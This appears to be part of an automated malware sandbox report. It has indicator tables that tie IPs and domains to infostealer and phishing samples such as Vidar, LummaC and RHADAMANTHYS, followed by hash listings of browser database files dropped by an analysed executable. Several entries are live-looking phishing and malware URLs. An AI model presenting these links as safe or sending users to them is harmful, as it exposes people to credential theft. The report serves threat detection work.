| | https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!s553e3fe901654d86bcc4ed44c7c05dd3&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0V1a19QbFZsQVlaTnZNVHRSTWZBWGRNQmtvbDQ2b1NlN1o5MGFiazNzS3lGSlE_ZT1UMnQ4S3Y&wd=target%28Sezione%20senza%20titolo.one%7C8d7e5173-6006-4648-a69d-e39e66e7041a%2FAblehnung%20Rechnung%20R15946098273-KU30_WE02%20Vom%2028%5C%2F%7Cd77916b9-b471-429a-a13e-74764563e56b%2F%29&wdorigin=NavigationUrl | malicious | HTMLPhisher | |
| | Sign.one | malicious | HTMLPhisher | |
| | https://app.box.com/s/0818uk4femepnk27set00nsfufvakx91 | malicious | HTMLPhisher | |
| | TMSSetup.exe | malicious | Unknown | |
| | Firstontario_FAX_832.eml | malicious | HTMLPhisher | |
| | PODIATRYASSOCIATES-OneDrive-file94077#.eml | malicious | HTMLPhisher | |
| | POSTA CERTIFICATA RE R Oggetto R Wennovia SRL on-site training.msg.cynet | malicious | Unknown | |
| | https://ecv.microsoft.com/ss9eL9LgBE | malicious | HTMLPhisher | |
| 116.203.12.114 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar | |
| | Setup.msi | malicious | Vidar | |
| | 69633f.msi | malicious | Vidar | |
| | dZKPE9gotO.exe | malicious | Vidar | |
| | nB52P46OJD.exe | malicious | Vidar | |
| | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | |
| | T0x859fNfn.exe | malicious | Vidar | |
| 149.154.167.99 | http://xn--r1a.website/s/ogorodru | malicious | Unknown | telegram.org/img/favicon.ico |
| | http://cryptorabotakzz.com/ | malicious | Unknown | telegram.org/ |
| | http://cache.netflix.com.id1.wuush.us.kg/ | malicious | Unknown | telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217 |
| | http://investors.spotify.com.sg2.wuush.us.kg/ | malicious | Unknown | telegram.org/ |
| | http://bekaaviator.kz/ | malicious | Unknown | telegram.org/ |
| | http://telegramtw1.org/ | malicious | Unknown | telegram.org/?setln=pl |
| | http://makkko.kz/ | malicious | Unknown | telegram.org/ |
| | http://telegram.dog | malicious | Unknown | telegram.dog/ |
| | LnSNtO8JIa.exe | malicious | Cinoshi Stealer | t.me/cinoshibot |
| | jtfCFDmLdX.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT | t.me/cinoshibot |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| chrome.cloudflare-dns.com | invoice.docm | malicious | Metasploit | 162.159.61.3 |
| | ep_setup.exe | malicious | Unknown | 162.159.61.3 |
| | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | 172.64.41.3 |
| | QhR8Zp6fZs.lnk | malicious | RHADAMANTHYS | 162.159.61.3 |
| | CNUXJvLcgw.lnk | malicious | RHADAMANTHYS | 172.64.41.3 |
| | xWpAZpLw47.lnk | malicious | RHADAMANTHYS | 172.64.41.3 |
| | File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk | malicious | Unknown | 172.64.41.3 |
| | pM3fQBuTLy.exe | malicious | Vidar | 162.159.61.3 |
                                                                                                                                                                                                                                                                                                tasktow.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                                                                QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                                                                fg.microsoft.map.fastly.netQhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                                                                CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                                                                xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                                                                R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                                                                ko.ps1.2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                                                                EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                                                                122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                                                                pkqLAMAv96.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                                                                IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                                                                873406390.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                                                                plus.l.google.comhttps://ryouthed.com/click.php?key=ij553tkpbj8t1lsuduh3&SUB_ID_SHORT=47f1db28f063a1d38918a2dcc31e91eb&COST_CPC=0.000050&PLACEMENT_ID=25101964&CAMPAIGN_ID=1170410&PUBLISHER_ID=2361353&ZONE_ID=4463547Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 142.250.181.46
                                                                                                                                                                                                                                                                                                https://drive.google.com/file/d/1zySfUjQ3GqIVAlBHIX3CXdgIcWIqrMkO/view?usp=sharing_eip&ts=67645d30Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 172.217.17.78
                                                                                                                                                                                                                                                                                                https://drive.google.com/file/d/1zySfUjQ3GqIVAlBHIX3CXdgIcWIqrMkO/view?usp=sharing_eil&ts=67645d30Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 142.250.181.46
                                                                                                                                                                                                                                                                                                ghostspider.7zGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 172.217.17.78
                                                                                                                                                                                                                                                                                                1So9BcQi1J.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                • 172.217.17.78
                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                • 142.250.181.46
                                                                                                                                                                                                                                                                                                UYJ0oreVew.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 172.217.17.78
                                                                                                                                                                                                                                                                                                L1SrJoDQvG.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 142.250.181.46
                                                                                                                                                                                                                                                                                                ZXVcgrmGRM.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                • 142.250.181.46
                                                                                                                                                                                                                                                                                                http://kiesermedicalcorporation.com/mklakdjhfhm/yftguihjo/anRvcnRvcmljaUBiaWdnZS5jb20=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 172.217.17.78
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                                                • 2.16.158.73
                                                                                                                                                                                                                                                                                                pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                • 23.219.82.40
                                                                                                                                                                                                                                                                                                QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                • 23.44.203.15
                                                                                                                                                                                                                                                                                                R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 23.44.203.84
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
No context
Process: C:\Users\user\Desktop\ktyihkdfesf.exe
File Type: ASCII text, with very long lines (1717), with CRLF line terminators
Category: dropped
Size (bytes): 10237
Entropy (8bit): 5.498288591230544
Encrypted: false
SSDEEP: 192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
MD5: 0F58C61DE9618A1B53735181E43EE166
SHA1: CC45931CF12AF92935A84C2A015786CC810AEC3A
SHA-256: AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
SHA-512: DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
Malicious: false
Preview: // Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):155648
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                                MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                                SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                                SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                                SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                                                                                SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                                                                                SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                                                                                SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                                MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                                SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                                SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                                SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                                                                                                MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                                                                                                SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                                                                                                                SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                                                                                                SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):294912
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.08436837154972243
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v2:51zkVmvQhyn+Zoz67f
                                                                                                                                                                                                                                                                                                MD5:BDDB3A7A4643B027E8E743D32B86297D
                                                                                                                                                                                                                                                                                                SHA1:AACAA39E60FB34908241F75550B1CEDDA50E37D1
                                                                                                                                                                                                                                                                                                SHA-256:13BC4A6A15651C116209341E97255C67980005927DFD9E91236E2E1517AF97EF
                                                                                                                                                                                                                                                                                                SHA-512:9A6244248CA636DB12AEC2E56DEAEAA2D62ED8378EA5A1D9947938DA15CA66BC4EDF11BF7CCC92E43734449EBECD03CF538BB61FCF90798DEBFD65098BC2A444
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.2678890710798698
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:L/2qOB1nxCkMWSA1LyKOMq+8iP5GDHP/0jMVum8:Kq+n0JW91LyKOMq+8iP5GLP/0Z
                                                                                                                                                                                                                                                                                                MD5:4410796A6E7A6E64DCA5EC2B9B8941AD
                                                                                                                                                                                                                                                                                                SHA1:14B68BB9ACACE8FD53484EC0F538E5B9CBC169DE
                                                                                                                                                                                                                                                                                                SHA-256:E675A0BB00F57AABC0D8190BDEBE53175794578111BAD71FB30E32221F1E4915
                                                                                                                                                                                                                                                                                                SHA-512:35EF59EBA6F084DDA22D48B8C58183609C20162328B0F022FFB329FCCC3BC28EAF832858B420EC0F203C9D36A9CF9F902C22E7BBBCAA870E98E1FA10E61CCB19
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):46255
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.087087347738988
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:8MkbJrT8IeQc5OKJ3Di1zNtPL2uzh9LVjhycnCiobJDSgzMMd6qD47u30p:8Mk1rT8HGKeFFobtSmd6qE7f
                                                                                                                                                                                                                                                                                                MD5:02B25DE32A4B60D501FB1D4FBD201A9F
                                                                                                                                                                                                                                                                                                SHA1:5F7EC7B9CCB946F444440B3524049F9DDCC61EAB
                                                                                                                                                                                                                                                                                                SHA-256:7549591876AE8D8EF5347926EB4A25299779E8C2D933D179224DF0FEE0A3255E
                                                                                                                                                                                                                                                                                                SHA-512:ABC4D9318AC6709C0EF7E1568A7018BBDCB70BF58CC0F52DF40BDB0AA3D9F1EE1E24E8E02FFF93A4626027B92DCD0061CFA426E2B006B6F92D702A4FC59AF435
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379149892090941","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"bc087678-5b99-4771-a549-04bf95f5d8e4"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6q
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):46131
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.087435435461075
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:8MkbJrT8IeQc5dKJ/Di1zNtPS92uzh9LVjhycnCiobJDSgzMMd6qD47u30p:8Mk1rT8H1KxLFFobtSmd6qE7f
                                                                                                                                                                                                                                                                                                MD5:AC6F70083E164B3012EB631864BB950C
                                                                                                                                                                                                                                                                                                SHA1:2A29F9A11667660B23B23C9B70D674D7E00AC908
                                                                                                                                                                                                                                                                                                SHA-256:096C054299E48F231FE1780A6B3B2B7E1319402C3A50DDEDFFABEE52652BE9E3
                                                                                                                                                                                                                                                                                                SHA-512:9C709A80B6F613E1048B44A583BB73FC49DAC75E3F1ABE8C996F98DF5E00A640121B9FEAE0E49A2A84E3CC178D1A710F06634731B2A392A142DCE7BE52F65C49
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):46178
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.087175637460811
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:8MkbJrT8IeQc5dKJ3Di1zNtPS92uzh9LVjhycnCiobJDSgzMMd6qD47u30p:8Mk1rT8H1KNLFFobtSmd6qE7f
                                                                                                                                                                                                                                                                                                MD5:BFDBEDC43B4926B90798094CF49C71FA
                                                                                                                                                                                                                                                                                                SHA1:1C9E4E33A0F47EEFF7FDA445BF85E11417958F08
                                                                                                                                                                                                                                                                                                SHA-256:E73B8DB9F50E358C9F9CE2D5BA8C4A6981E4F75F3058A10FD129C78F6C96EB55
                                                                                                                                                                                                                                                                                                SHA-512:22BF0FC0B913500CF19AF0669B3ACD247E079A3A4E1FA1F6F10F74E55BDF15B2F36673EC59E22BFAF9C86AC8972763107544D7A6EEDA3BC0985EA8A4F2A4AE66
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):44922
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.09494174462605
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWvYi1zNtPSN6IC6CsKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn/FKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                MD5:17DD9B46D87BDB86C4D0A7528A9FD28E
                                                                                                                                                                                                                                                                                                SHA1:41FFB886512F4C041D5C1F8EB6EBA62C0D594AE0
                                                                                                                                                                                                                                                                                                SHA-256:8567EBFEC30F1BE0B55CABECBE374A2EE98FF5E42DD4ED62D639D83B94C0332A
                                                                                                                                                                                                                                                                                                SHA-512:42D7DFCA272E2165299F690E55FC78783DA400DB6FC511120FC856C4AFE4A5435302B0D0302C3CCAF4028791420400AA4B3D2C1D52E127D559541710437E6B53
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                                                MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                                                SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                                                SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                                                SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                                                                MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                Malicious:false
